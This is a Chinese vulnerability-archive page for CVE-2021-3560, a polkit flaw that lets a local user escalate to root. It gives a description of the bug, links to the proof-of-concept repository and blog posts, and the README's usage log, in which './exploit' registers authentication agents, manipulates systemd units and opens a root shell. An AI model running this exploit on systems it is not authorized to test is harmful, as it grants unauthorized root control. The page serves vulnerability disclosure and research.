目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2021-3560 PoC — polkit 代码问题漏洞

来源
https://github.com/WinMin/CVE-2021-3560
关联漏洞
标题:polkit 代码问题漏洞 (CVE-2021-3560)
Description:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞,该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时,该进程无法获得进程的唯一uid和pid,也无法验证请求进程的特权。
Description
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
介绍
PolicyKit CVE-2021-3560 Exploitation (Authentication Agent)
====
C implementation of CVE-2021-3560 exploitation, blog posts about this exploitation: 
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation

### Contributors
Code by swing (@WinMin), Ricter Z(@RicterZ)

### Usage
```
dev@server:/tmp/CVE-2021-3560$ make
dev@server:/tmp/CVE-2021-3560$ ./exploit
pid:264181 - [ polkit CVE-2021-3560 exploit ] - RicterZ @ 360 Noah Lab, C writed by Swing @ chaitin
pid:264181 - [*] main process running ...
pid:264183 - [*] starting polkit authentication agent ...
pid:264182 - [*] starting polkit authentication agent ...
pid:264185 - [*] starting polkit authentication agent ...
pid:264183 - [*] trying to register authentication agent to polkit ...
pid:264182 - [*] trying to register authentication agent to polkit ...
pid:264183 - [+] polkit authentication agent registered successfully!
pid:264183 - [+] D-Bus message loop now running ..
pid:264185 - [*] trying to register authentication agent to polkit ...
pid:264182 - [+] polkit authentication agent registered successfully!
pid:264182 - [+] D-Bus message loop now running ..
pid:264185 - [+] polkit authentication agent registered successfully!
pid:264185 - [+] D-Bus message loop now running ..
pid:264183 - [*] trying to enable system unit file '/tmp/pwnkit.service' ...
pid:264182 - [*] trying to start systemd service 'pwnkit.service' ...
pid:264185 - [*] trying to reload systemd daemon ...
pid:264183 - [+] received authentication for action 'org.freedesktop.systemd1.manage-unit-files' ...
pid:264183 - [*] sending agent response with cookie: 61-bf243e2d0039ce513f32553f945c80d7-1-dddae4b0320b4030370585c13b6a9985
pid:264182 - [+] received authentication for action 'org.freedesktop.systemd1.manage-units' ...
pid:264182 - [*] sending agent response with cookie: 62-c23ffa64bf9c05a1ca8bf057d56a9dfd-1-8d220cfb275f861dcfacd340fc5a578a
pid:264185 - [+] received authentication for action 'org.freedesktop.systemd1.reload-daemon' ...
pid:264185 - [*] sending agent response with cookie: 63-3b99bb8ff0b6b3ffcb7e6103fbe86073-1-6d47c6a380691defd9c455eba617513d
pid:264181 - [+] file exists, popping root shell ...
pwned-5.0# id
uid=1000(dev) gid=1000(dev) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(dev)
pwned-5.0#
```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →